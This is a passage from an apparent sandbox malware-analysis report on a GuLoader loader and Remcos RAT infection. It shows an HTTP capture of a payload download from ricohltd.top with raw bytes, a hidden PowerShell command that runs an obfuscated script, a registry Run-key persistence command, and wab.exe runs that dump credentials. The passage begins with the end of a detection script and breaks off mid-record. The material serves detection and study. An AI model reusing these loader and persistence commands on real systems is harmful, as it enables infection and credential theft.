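    for rule, detail in correlate(report_events()):
        print(f"{rule:28} {detail}")
```

Run on the constructed events the script raises six alerts: three for wab.exe making any outbound connection, one for the duckdns.org resolution, one for the follow-up connection to the resolved address on port 29871, and one for the geoplugin.net lookup. The payload fetch from ricohltd.top over 443 is only caught by the process rule; a CDN-fronted host and a standard port give the DNS and port heuristics nothing to key on, which is why the process-based rule is the one worth deploying first.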


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49707 | 172.67.191.112 | 443 | 2644 | C:\Program Files (x86)\Windows Mail\wab.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-26 05:44:21 UTC | 173 | OUT | GET /aCqwFQDQz144.bin HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                      Host: ricohltd.top
                                                      Cache-Control: no-cache
2024-04-26 05:44:21 UTC | 840 | IN | HTTP/1.1 200 OK
                                                      Date: Fri, 26 Apr 2024 05:44:21 GMT
                                                      Content-Type: application/octet-stream
                                                      Content-Length: 494656
                                                      Connection: close
                                                      Last-Modified: Mon, 15 Apr 2024 18:39:36 GMT
                                                      ETag: "661d7468-78c40"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      CF-Cache-Status: HIT
                                                      Age: 231204
                                                      Accept-Ranges: bytes
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c1ffA9aZlCmqakeWDnYd6bNLon2lPvzmtdNrWc0UQ4nYyTzzrYkjq0qklyIEEM7x7Ko8LyDklASUZMQ5K1uAsrdQ6BCF2HmwupoYv%2Bg%2BJDQf6%2F7mv1FIecOMK3LUQoo%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                      X-Content-Type-Options: nosniff
                                                      Server: cloudflare
                                                      CF-RAY: 87a442ae8c5cd9f9-MIA
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-04-26 05:44:21 UTC529INData Raw: 03 a6 a8 e2 1f 9d 3d 79 f2 7f 54 c4 c6 ff a6 de ec 0d 2d ae 32 50 df bc d0 75 ae 2d c7 b4 bb bd 22 37 1d 29 cb e3 35 ab de f7 e7 2f 85 26 68 6c d2 bc a0 9c b3 09 3c 8f dc 6f cf fd 14 29 5a 5b 44 19 f7 89 e3 a0 9f 9a df 2e 88 fe 05 9c a2 dd 9e 65 67 14 01 b3 d8 66 e3 30 76 58 7e 37 e3 53 8d 4c 81 a6 54 b9 60 e1 cc 35 ab 0b 41 2f c5 8e 71 9d 7c cd 35 68 ac 42 c8 99 ce 98 ac 4e 2f b7 7c d1 3c 86 d6 92 0b 66 28 0d 47 04 bf 78 ee 80 3c 87 bb 79 05 cf 6b 7f 06 2d fb 6d 0d cf 2a b3 a4 04 9f 13 96 a9 11 fe ff 09 95 41 cf aa f8 15 2e 5e 98 38 c8 97 72 e4 19 45 30 47 c5 72 47 cf 0b c5 9d 7e aa f1 8f 7c 1e c6 b6 69 0f 08 43 4a a6 cb 14 44 89 3e 32 f5 89 37 a1 70 a3 1c 6c b9 06 13 f5 ea d3 4d 6d 26 b4 22 1c da 2c f1 36 40 88 2d ad 53 14 e5 50 7b b2 76 e8 7f 5b 61 b0
                                                      Data Ascii: =yT-2Pu-"7)5/&hl<o)Z[D.egf0vX~7SLT`5A/q|5hBN/|<f(Gx<yk-m*A.^8rE0GrG~|iCJD>27plMm&",6@-SP{v[a
                                                      2024-04-26 05:44:21 UTC1369INData Raw: db 4f 7b 44 d1 b3 da 6b bb f1 36 00 88 0c 0e c2 3e b6 3e 8a 7e 31 f5 f4 85 2a 8b fe cd b2 75 2f f0 14 4a dc ad 1c 3f 2a ed e9 de a8 1f 40 2f c8 4f 47 97 71 dc 5d f3 f3 a0 69 23 e4 bd 82 2a 19 b7 08 92 b8 48 1d a3 65 94 93 bd fb 55 a4 36 12 8b 31 1c c8 4b 6b f5 ed 25 3f c8 02 3c 35 27 1c d1 e9 4a 2c 4d bd 85 02 9e 6b b5 9a c8 44 38 a9 38 6d 4d c9 9e 3d 5a 9e f4 3b c6 b0 1a 2d e4 f2 ab f5 b2 8a a8 6c 5c e6 5c 65 ce 4e 7b bd c2 6e ef 44 2b ac a4 8d 6d 6c c8 ce 87 4a cf 1d 41 11 c7 cc 9f 5c 99 d0 61 54 c0 2b 17 c0 44 72 62 fc 3b 94 48 b1 bb 06 61 2b 68 64 35 fa fc 41 90 6c 80 4b 96 e9 c7 56 62 f5 86 a2 0a 55 fc 0b 46 27 88 04 ca ac a1 fe 7a 61 51 22 b0 e2 06 00 b3 4a 9a 19 19 cf dc f3 5d 88 0b b5 98 38 c0 e1 75 73 af 78 d0 d0 06 2d 40 e0 69 8b 02 11 91 86 c0
                                                      Data Ascii: O{Dk6>>~1*u/J?*@/OGq]i#*HeU61Kk%?<5'J,MkD88mM=Z;-l\\eN{nD+mlJA\aT+Drb;Ha+hd5AlKVbUF'zaQ"J]8usx-@i
                                                      2024-04-26 05:44:21 UTC1369INData Raw: 0b 29 b6 45 cb 71 75 47 f9 36 68 f5 81 71 79 9a df a4 a7 b1 ba 72 ce ee 2b 56 63 02 43 2c 81 45 48 2b 9a 03 90 00 b3 9b e1 ff ad 0c 0d 0f ed 5b 4b 6c 49 4b e8 d3 24 a4 b5 dc db dd 68 8b 27 fb 89 03 d6 ab 35 2b 86 7c 18 e6 72 88 dd 3e 45 69 84 af 72 fe 57 3a 19 26 bb fa 38 5a 02 56 fd e3 52 2f 1a 49 07 31 ad 69 f9 03 dc b1 cc 1d b9 c5 03 24 e6 d1 0c 12 30 d2 7c 24 84 bb 58 c4 63 a4 cb 36 0a e3 54 36 ce 8f 7b 71 1f 6d 38 0c d2 3e 68 b4 1b 20 8c 03 86 7b 04 19 fc b3 35 cb 84 7d 1e 26 f6 af 2d d6 b0 f1 76 c5 6e 03 0b bf 83 2d a5 b1 f6 49 b7 c1 85 aa 94 07 25 19 db 0e 1f 78 1f 77 1e 68 b8 05 f1 8e be 38 dc 14 a1 c0 12 28 77 9b 8d 42 27 9d 6e ff c0 b2 1a 9a 5e fd 67 42 33 98 65 94 30 16 3a 56 63 ab 2d 31 f2 49 eb fd 45 d3 a8 f8 f2 4e cf 45 3c 08 95 ce e6 c2 84
                                                      Data Ascii: )EquG6hqyr+VcC,EH+[KlIK$h'5+|r>EirW:&8ZVR/I1i$0|$Xc6T6{qm8>h {5}&-vn-I%xwh8(wB'n^gB3e0:Vc-1IENE<
                                                      2024-04-26 05:44:21 UTC1369INData Raw: 7d 95 f7 9c dc 6f b0 5b a8 4a 9b 83 f9 8a b2 6e 31 27 9d 38 9c 30 33 ea 64 12 0c bb 7e a0 24 15 dc 9c cf 7f 6d 90 0f 10 ae 10 da a2 b1 8d 07 4e b1 2f fe e9 76 6a 5b 62 08 f6 cb 24 f7 c5 38 0e 41 af 17 a4 da 91 ab 48 de e1 f3 04 8a 0d 1f 24 44 52 8d d3 23 de aa 59 87 0e 32 1d 47 a5 ae 1c 81 df 26 24 f0 34 37 00 aa 81 b4 f2 74 de 66 81 b4 89 07 be df 02 36 55 db 32 13 46 a7 5a c7 3a 1f 0e f6 82 42 09 8e 79 eb 4f 79 ed 74 ea 07 1a bd 96 39 59 2e 9c 11 64 4c 8d d8 76 8f d8 39 33 44 1b 56 51 5d fb 6e 6e d7 e5 21 30 02 24 48 ca 57 93 df ef 78 ed f1 04 2e d4 d1 54 06 21 b9 e9 1c 21 69 78 6b 7b 1b 06 95 4b 5c fe a3 79 97 13 90 0f 39 aa e3 91 7a 61 94 81 75 e4 7b 68 a9 62 7d ed 69 84 40 a3 8e ac 1f 7e 03 6f b1 79 78 37 22 00 4f cb e2 d3 17 5f 39 6c 54 07 e5 8b c0
                                                      Data Ascii: }o[Jn1'803d~$mN/vj[b$8AH$DR#Y2G&$47tf6U2FZ:ByOyt9Y.dLv93DVQ]nn!0$HWx.T!!ixk{K\y9zau{hb}i@~oyx7"O_9lT
                                                      2024-04-26 05:44:21 UTC1369INData Raw: 94 4c 7c 27 9c 54 09 b6 0a b8 70 73 52 5c 92 ac a7 a6 4b da 98 9e 98 a4 96 ef e8 69 7d dc 95 ca de cb 26 20 b5 02 0b bb 29 41 a4 3f 39 12 9f d5 c0 14 f1 13 da b8 d1 1c a1 67 ef 37 a0 77 86 1e 0f 89 53 7b 3d 7d 5b 9a 73 2e 1f 17 74 4c d7 f0 a4 97 c0 a3 79 fa bf e3 bd ab f0 47 ea 92 7a 54 de 48 78 3f 17 4b cc 4e bc ea f3 79 e9 55 72 48 8f d7 e4 5d 13 8c 0d 8a 13 ef 99 b4 d1 4f d3 1d 78 82 99 d0 41 3f d3 71 d8 86 e2 54 84 24 c6 99 c6 c0 90 d7 dc 02 c6 6b 5a 40 c6 6c 64 6b d7 04 91 cd a1 bf 68 3d d4 6e 26 1f bb 39 cf 14 2d 10 fc 93 17 d1 fe ac d6 9e c0 03 e6 53 f8 f9 97 64 d6 11 ab 62 0a cd 87 cf 1d f5 0d f6 eb 61 d7 ab 49 7e 24 52 9d df b3 29 e6 3a 74 92 16 a8 12 87 b5 f4 12 3f a0 82 4f 3b c5 36 ac 1b 58 b2 1f fc 7a cd ae 0e be 34 71 88 c2 eb 5d 79 e8 2c 27
                                                      Data Ascii: L|'TpsR\Ki}& )A?9g7wS{=}[s.tLyGzTHx?KNyUrH]OxA?qT$kZ@ldkh=n&9-SdbaI~$R):t?O;6Xz4q]y,'
                                                      2024-04-26 05:44:21 UTC1369INData Raw: 02 b7 3f e3 cd 35 3d 1c bd b3 b4 c6 06 76 79 5e 9e f4 b0 2e 7b d5 ae d9 dc c7 e7 e5 03 4f 92 a3 5d 8a 6d 8f 1f e0 75 2a 8b 1c bb d4 fc df 40 85 b1 35 31 78 1a 27 4a b3 ee 38 4f 5b 10 72 f8 49 b7 49 b8 9b 4b b4 f9 a9 a3 d3 57 b5 4e 34 51 89 21 67 64 35 a3 52 cc 5b 84 01 b5 69 16 4c 9e 8a 9a 8b a2 0a 96 da 0b 0d c6 07 f8 5d 37 2d 75 b1 da a3 ca 21 1c 79 f8 38 5c 15 d2 90 df 34 20 5e 88 0b 3e cd 38 4b 2e 1f 73 c5 78 59 80 ee a6 fe 31 e4 a7 2e 2f ca 44 c4 6a 21 8f c7 8a 94 ed 5a fc f7 9a ff 6e d3 46 a6 87 6f 1e 83 09 b8 a9 bd 77 a5 23 b3 0a e5 14 ca 1c 07 ef b3 05 00 40 ca 1e 48 97 e8 3d f2 6e 88 65 63 de 9c 8b 81 ca 5e f8 b9 f5 16 0d 36 7a 93 04 c4 86 e0 43 d2 bb 1e 50 52 66 8f a0 83 2b 90 2c 9a 04 04 cd 72 60 24 98 28 76 68 34 3f 11 6d f9 58 72 c0 00 c5 b0
                                                      Data Ascii: ?5=vy^.{O]mu*@51x'J8O[rIIKWN4Q!gd5R[iL]7-u!y8\4 ^>8K.sxY1./Dj!ZnFow#@H=nec^6zCPRf+,r`$(vh4?mXr
                                                      2024-04-26 05:44:21 UTC1369INData Raw: cf c5 31 c4 dc cf 39 59 f5 0a 7a 24 bd c7 19 bb 3a 94 e9 b7 b8 94 f5 ec 13 e2 0d e3 3e 17 35 77 73 ae 4a 3b 81 05 6c 59 e7 74 48 73 ed 75 14 d5 71 43 3d ad 02 41 9d b6 e6 ae 1b 0f b8 f7 6e 7b 7a ee f2 86 bf f4 a8 14 2e 9d c5 8b 86 50 57 d7 5d 95 04 65 58 1a 55 b5 95 9f 64 49 0b 3f de 0e 8a e7 fb ee f8 d2 8b 99 0f 60 2e fe 1a a7 e5 10 45 3f 63 42 da 4e 76 f1 69 69 51 52 2d bb b1 85 ae 73 43 4b 27 82 db 45 cf 95 50 99 54 60 7f d0 65 56 4f a1 d4 ae b4 a4 dd 7f 32 db 1a ba e8 4d ff 6a a9 52 f2 d4 b4 00 77 e2 6b 5d 89 6f 34 5a df c2 d3 53 c7 04 9a a2 18 92 57 b6 b3 eb f3 40 e4 b0 27 ae 3e 5d 4f e6 8a 31 b8 e3 3a 40 ab e6 83 4a f8 63 bd 1f 02 1f ae 33 aa 24 ff e2 55 7b be e5 a5 10 22 51 12 03 13 28 14 8a a1 f4 6a 3f bd db ca 9d 91 b4 7f 8e a1 be 7a 48 e5 d5 1e
                                                      Data Ascii: 19Yz$:>5wsJ;lYtHsuqC=An{z.PW]eXUdI?`.E?cBNviiQR-sCK'EPT`eVO2MjRwk]o4ZSW@'>]O1:@Jc3$U{"Q(j?zH
                                                      2024-04-26 05:44:21 UTC1369INData Raw: e8 91 97 b9 79 77 67 a8 80 90 61 49 b5 35 f9 2e d8 33 80 26 92 cc 2e 15 c1 7c 81 3c ca 55 5f cd b3 60 de 9e ce 50 af f8 e3 15 be 12 2d 0a 90 af 97 84 8d 52 e1 a3 47 fc 3b 44 21 01 c4 3b b7 ca bb e4 c1 a0 54 a2 1c b7 35 d4 bf ad 2a 70 ed 48 4c 94 4c 9c 42 ee b2 35 cd a4 78 ab 7c 83 77 29 06 95 12 86 c6 36 f5 b3 8f c9 cd 3d 42 4c af 7a 61 cd b2 0f c3 5d 46 ea e9 31 c9 85 cb 7a a3 8e f5 1f e2 aa 27 7c 31 90 1c 37 6a 4e f8 6b fc ee 37 11 cc 5c 6e 0f 74 43 82 e8 59 34 ff fb 73 6c 6c 5a 79 12 f6 7f 20 7e 42 6c 9e 40 05 86 c5 39 a7 8e 6f 4d 10 c2 67 60 44 d8 12 55 f3 fb e8 66 76 e0 fe 4b 94 78 cb 2c f3 75 d0 6d b2 f0 34 6b ae df f4 c9 ab 5e 78 76 b3 78 64 c8 3c 98 6f ac 3e 06 85 03 9e e0 33 61 ee 69 09 8e bb 3f 0b dd 0d e2 69 b4 6e ba c5 a9 3e 5d 0b bd 69 1c 83
                                                      Data Ascii: ywgaI5.3&.|<U_`P-RG;D!;T5*pHLLB5x|w)6=BLza]F1z'|17jNk7\ntCY4sllZy ~Bl@9oMg`DUfvKx,um4k^xvxd<o>3ai?in>]i
                                                      2024-04-26 05:44:21 UTC1369INData Raw: 57 bc 16 12 97 ef 42 36 79 5a 6f b4 2f 4b d4 71 83 13 62 d5 c0 4a 69 90 c5 7b 82 c7 d0 62 3c 9a 80 85 12 79 a5 06 56 af 99 39 3f e0 e3 85 d1 d9 19 48 cb ca 8c ae 80 e2 e8 05 f8 32 a5 4f 31 d4 a6 df 13 b4 45 c3 d4 29 10 bb 7b 4d 9f da a8 45 58 6c be 24 bf 74 4b 7c 9b 78 bd 14 b3 86 a8 77 fa 44 33 06 d2 64 84 3e f5 4f 7e cd f3 8a d6 4e 7f b1 35 c8 c2 20 a0 86 2c 5d 4b 6a 0e b7 88 83 bf 05 c9 87 0c 45 87 07 14 7e a8 9f 19 fc ce fa 46 90 14 3a ac 5a a4 fc 77 3b b6 7c 09 44 b8 56 20 1a e6 99 38 a2 ba 8e 32 f7 cc dc e2 35 f8 35 e4 1c 51 e1 eb 33 10 63 22 4e 8a cc 47 83 b4 d6 f9 f4 0c b8 13 15 19 6b a6 25 ea 44 08 38 2a 81 ad a5 98 9a a1 a8 87 ed c8 62 3a de 91 c3 0e 37 48 27 34 6e 00 63 ac 65 ac bd ae de df 07 8f f3 ea 33 22 6f dd ef 03 49 15 3d cf 28 c7 a1 bc
                                                      Data Ascii: WB6yZo/KqbJi{b<yV9?H2O1E){MEXl$tK|xwD3d>O~N5 ,]KjE~F:Zw;|DV 8255Q3c"NGk%D8*b:7H'4nce3"oI=(
                                                      2024-04-26 05:44:21 UTC1369INData Raw: f2 73 85 62 f6 43 1c 16 39 a1 ac dd 34 22 f2 6b 38 0e ba 05 92 01 23 c4 b5 18 e2 4a 67 68 4b 2f 9d fb 46 87 2f 93 c1 7d e8 ae c6 07 8f f1 55 8a 97 51 d5 d7 ff fb b5 30 1f e5 ec 21 53 79 f3 49 9d 02 3f c9 45 eb 23 15 fa e1 7e 05 06 ba e7 14 65 77 4c 16 58 fa 60 b1 ca 17 6c 02 44 55 0b e7 62 99 d4 71 46 8b 81 04 bb 07 46 fc ae 50 03 86 9e 78 ff 09 af 81 0c 50 d1 6e ed c9 2d 8b 2c f9 26 85 a5 eb fb cd 74 60 24 74 d7 89 f9 e4 b5 1c d0 28 b7 f1 bd f3 b0 e1 0a 0a b1 d4 55 30 00 61 9d 48 06 2d 76 52 7e 3f 34 c4 c4 da de c2 8f d8 38 18 50 72 62 4d c6 47 80 ee 8d a1 e7 b4 99 f4 79 b8 d1 a5 eb 33 1f 86 09 0a fe 63 90 88 3a 6d 20 b2 cc 60 42 2e 34 47 04 2c 11 ec ba 9c 91 f2 3e 61 c0 fa 60 88 96 00 fd 98 12 61 35 01 a8 dc b0 70 87 fb 0a aa e5 10 2a 7b 1e 9f 58 73 5d
                                                      Data Ascii: sbC94"k8#JghK/F/}UQ0!SyI?E#~ewLX`lDUbqFFPxPn-,&t`$t(U0aH-vR~?48PrbMGy3c:m `B.4G,>a`a5p*{Xs]


                                                      Target ID:0
                                                      Start time:07:42:57
                                                      Start date:26/04/2024
                                                      Path:C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe"
                                                      Imagebase:0x400000
                                                      File size:561'426 bytes
                                                      MD5 hash:EDEB34F392872F3C9E220BC9DCF9BA86
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:2
                                                      Start time:07:42:57
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"powershell.exe" -windowstyle hidden "$Interlucent=Get-Content 'C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\unvolubly\Langtrkkendes\Pelletising.Art';$Sciography=$Interlucent.SubString(57898,3);.$Sciography($Interlucent)"
                                                      Imagebase:0xb00000
                                                      File size:433'152 bytes
                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2927351766.0000000009F92000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:3
                                                      Start time:07:42:57
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:4
                                                      Start time:07:42:59
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
                                                      Imagebase:0x1c0000
                                                      File size:236'544 bytes
                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:7
                                                      Start time:07:44:04
                                                      Start date:26/04/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                      Imagebase:0x380000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.3324378709.0000000009A7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000003.2945584583.0000000009A7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:moderate
                                                      Has exited:false

                                                      Target ID:8
                                                      Start time:07:44:19
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Emraud" /t REG_EXPAND_SZ /d "%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)"
                                                      Imagebase:0x1c0000
                                                      File size:236'544 bytes
                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:9
                                                      Start time:07:44:19
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:10
                                                      Start time:07:44:19
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\SysWOW64\reg.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Emraud" /t REG_EXPAND_SZ /d "%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)"
                                                      Imagebase:0x600000
                                                      File size:59'392 bytes
                                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:12
                                                      Start time:07:44:26
                                                      Start date:26/04/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iqylzxvzgukwqzib"
                                                      Imagebase:0x380000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:13
                                                      Start time:07:44:26
                                                      Start date:26/04/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\lkdwaqoatccasgefpzj"
                                                      Imagebase:0x380000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:15
                                                      Start time:07:44:26
                                                      Start date:26/04/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\vmqobizuhkvfdmsjykvozo"
                                                      Imagebase:0x380000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:19
                                                      Start time:07:44:27
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6908 -s 12
                                                      Imagebase:0xc30000
                                                      File size:483'680 bytes
                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:20
                                                      Start time:07:44:27
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5996 -s 12
                                                      Imagebase:0xc30000
                                                      File size:483'680 bytes
                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:21
                                                      Start time:07:44:27
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3352 -s 12
                                                      Imagebase:0xc30000
                                                      File size:483'680 bytes
                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:23
                                                      Start time:07:44:32
                                                      Start date:26/04/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qtegxhlgdhz"
                                                      Imagebase:0x380000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:24
                                                      Start time:07:44:32
                                                      Start date:26/04/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\awsyyzwhrprlrb"
                                                      Imagebase:0x380000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:26
                                                      Start time:07:44:32
                                                      Start date:26/04/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\cqxrzshbfxjqbhhfak"
                                                      Imagebase:0x380000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:29
                                                      Start time:07:44:32
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6212 -s 12
                                                      Imagebase:0xc30000
                                                      File size:483'680 bytes
                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:30
                                                      Start time:07:44:37
                                                      Start date:26/04/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hhytwjmog"
                                                      Imagebase:0x380000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:31
                                                      Start time:07:44:37
                                                      Start date:26/04/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\sbdlxbwhukxba"
                                                      Imagebase:0x380000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:33
                                                      Start time:07:44:37
                                                      Start date:26/04/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\uvjexuhjqspgcijx"
                                                      Imagebase:0x380000
